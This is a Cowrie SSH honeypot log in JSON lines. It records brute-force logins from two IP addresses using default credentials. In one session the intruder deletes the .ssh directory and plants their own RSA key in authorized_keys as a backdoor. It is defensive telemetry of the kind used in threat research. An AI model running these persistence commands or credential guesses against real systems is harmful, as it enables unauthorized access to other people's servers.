{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11834,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c803abcd8c6","protocol":"ssh","message":"New connection: 185.152.45.241:11834 (1.2.3.4:22) [session: 0c803abcd8c6]","sensor":"my-vps","timestamp":"2025-09-09T02:53:44.739497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:44.753778Z","src_ip":"185.152.45.241","session":"0c803abcd8c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:44.799001Z","src_ip":"185.152.45.241","session":"0c803abcd8c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:53:45.024083Z","src_ip":"185.152.45.241","session":"0c803abcd8c6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:45.079090Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:45.080444Z","src_ip":"185.152.45.241","session":"0c803abcd8c6"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11824,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cb1ad948205","protocol":"ssh","message":"New connection: 185.152.45.241:11824 (1.2.3.4:22) [session: 9cb1ad948205]","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.459620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.473623Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.528440Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.login.success","username":"root","password":"p@s5w0rd123","message":"login attempt [root/p@s5w0rd123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.758911Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:55:03.878068Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.878788Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.879975Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:55:03.929904Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:55:04.128717Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.129565Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.178371Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.179310Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11838,"dst_ip":"1.2.3.4","dst_port":22,"session":"3989887ec967","protocol":"ssh","message":"New connection: 185.152.45.241:11838 (1.2.3.4:22) [session: 3989887ec967]","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.224326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.225064Z","src_ip":"185.152.45.241","session":"3989887ec967"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.273189Z","src_ip":"185.152.45.241","session":"3989887ec967"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:55:04.519645Z","src_ip":"185.152.45.241","session":"3989887ec967"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.569329Z","src_ip":"185.152.45.241","session":"3989887ec967"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11837,"dst_ip":"1.2.3.4","dst_port":22,"session":"132b018e2f95","protocol":"ssh","message":"New connection: 185.152.45.241:11837 (1.2.3.4:22) [session: 132b018e2f95]","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.614047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.614787Z","src_ip":"185.152.45.241","session":"132b018e2f95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.663663Z","src_ip":"185.152.45.241","session":"132b018e2f95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.899241Z","src_ip":"185.152.45.241","session":"132b018e2f95"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.948802Z","src_ip":"185.152.45.241","session":"9cb1ad948205"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:55:05.950189Z","src_ip":"185.152.45.241","session":"132b018e2f95"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11866,"dst_ip":"1.2.3.4","dst_port":22,"session":"456aa0b715a8","protocol":"ssh","message":"New connection: 185.152.45.241:11866 (1.2.3.4:22) [session: 456aa0b715a8]","sensor":"my-vps","timestamp":"2025-09-09T02:56:23.194616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:56:23.195534Z","src_ip":"185.152.45.241","session":"456aa0b715a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:56:23.268887Z","src_ip":"185.152.45.241","session":"456aa0b715a8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:23.523439Z","src_ip":"185.152.45.241","session":"456aa0b715a8"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:24.740741Z","src_ip":"185.152.45.241","session":"456aa0b715a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58488,"dst_ip":"1.2.3.4","dst_port":22,"session":"91304d303fcc","protocol":"ssh","message":"New connection: 212.227.125.160:58488 (1.2.3.4:22) [session: 91304d303fcc]","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.494934Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.538320Z","src_ip":"212.227.125.160","session":"91304d303fcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59152,"dst_ip":"1.2.3.4","dst_port":22,"session":"db9f12926146","protocol":"ssh","message":"New connection: 212.227.125.160:59152 (1.2.3.4:22) [session: db9f12926146]","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.578753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.579332Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.621322Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.802359Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:56:48.954851Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:56:48.955513Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.006204Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.007248Z","src_ip":"212.227.125.160","session":"db9f12926146"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33778,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1cdba839401","protocol":"ssh","message":"New connection: 212.227.125.160:33778 (1.2.3.4:22) [session: e1cdba839401]","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.048389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.049927Z","src_ip":"212.227.125.160","session":"e1cdba839401"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.106094Z","src_ip":"212.227.125.160","session":"e1cdba839401"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:49.321513Z","src_ip":"212.227.125.160","session":"e1cdba839401"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:50.379300Z","src_ip":"212.227.125.160","session":"e1cdba839401"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41626,"dst_ip":"1.2.3.4","dst_port":22,"session":"863c60012fc2","protocol":"ssh","message":"New connection: 212.227.125.160:41626 (1.2.3.4:22) [session: 863c60012fc2]","sensor":"my-vps","timestamp":"2025-09-09T02:56:50.421678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:56:50.425808Z","src_ip":"212.227.125.160","session":"863c60012fc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:56:50.484208Z","src_ip":"212.227.125.160","session":"863c60012fc2"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-09-09T02:56:50.721318Z","src_ip":"212.227.125.160","session":"863c60012fc2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:56:51.780666Z","src_ip":"212.227.125.160","session":"863c60012fc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49494,"dst_ip":"1.2.3.4","dst_port":22,"session":"652874415dad","protocol":"ssh","message":"New connection: 212.227.125.160:49494 (1.2.3.4:22) [session: 652874415dad]","sensor":"my-vps","timestamp":"2025-09-09T02:56:51.830729Z"}
